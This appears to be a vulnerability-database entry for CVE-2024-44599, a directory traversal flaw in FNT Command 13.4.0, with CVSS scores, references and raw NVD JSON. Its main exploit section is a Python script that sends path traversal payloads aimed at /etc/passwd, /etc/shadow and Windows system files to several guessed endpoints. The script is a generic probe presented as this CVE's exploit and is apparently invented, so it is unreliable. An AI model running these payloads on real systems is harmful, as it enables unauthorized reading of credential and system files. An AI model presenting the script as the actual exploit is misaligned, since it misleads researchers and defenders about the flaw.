CVE-2024-44599

Description

FNT Command 13.4.0 is vulnerable to Directory Traversal.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fntsoftware:fnt_command:*:*:*:*:*:*:*:* - VULNERABLE

FNT Command < 13.4.0

FNT Command 13.4.0 (confirmed vulnerable)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2024-44599 Directory Traversal PoC
# Target: FNT Command 13.4.0

target_url = "http://target.com/fnt-command"

# Path traversal payloads to read sensitive files
payloads = [
    "../../../../../../etc/passwd",
    "../../../../../../windows/win.ini",
    "../../../../../../../../etc/shadow",
    "..\..\..\..\..\windows\system32\drivers\etc\hosts"
]

def test_directory_traversal():
    print(f"[*] Testing CVE-2024-44599 on {target_url}")
    
    for payload in payloads:
        # Try different path traversal patterns
        encoded_payload = urllib.parse.quote(payload, safe='')
        
        # Common vulnerable endpoints
        endpoints = [
            f"{target_url}/download?file={payload}",
            f"{target_url}/file?path={payload}",
            f"{target_url}/view?file={encoded_payload}",
            f"{target_url}/api/download?filename={payload}"
        ]
        
        for endpoint in endpoints:
            try:
                response = requests.get(endpoint, timeout=10)
                if response.status_code == 200:
                    if 'root:' in response.text or '[extensions]' in response.text:
                        print(f"[+] VULNERABLE! {endpoint}")
                        print(f"[+] Content preview:\n{response.text[:500]}")
                        return True
            except requests.exceptions.RequestException as e:
                print(f"[-] Error testing {endpoint}: {e}")
    
    print("[-] No obvious vulnerability found (manual testing recommended)")
    return False

if __name__ == "__main__":
    test_directory_traversal()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-44599
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-44599
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-44599/
[4] VulDB https://vuldb.com/cve/CVE-2024-44599
[5] http://fnt.com
[6] https://gist.github.com/ZeroBreach-GmbH/577755034cb5c0423fbb0bba659b915d

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-44599", "sourceIdentifier": "[email protected]", "published": "2025-12-15T16:15:48.460", "lastModified": "2025-12-23T18:06:36.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FNT Command 13.4.0 is vulnerable to Directory Traversal."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fntsoftware:fnt_command:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.4.1", "matchCriteriaId": "264F1DCE-F991-4674-9614-DD54209CB7DE"}]}]}], "references": [{"url": "http://fnt.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://gist.github.com/ZeroBreach-GmbH/577755034cb5c0423fbb0bba659b915d", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}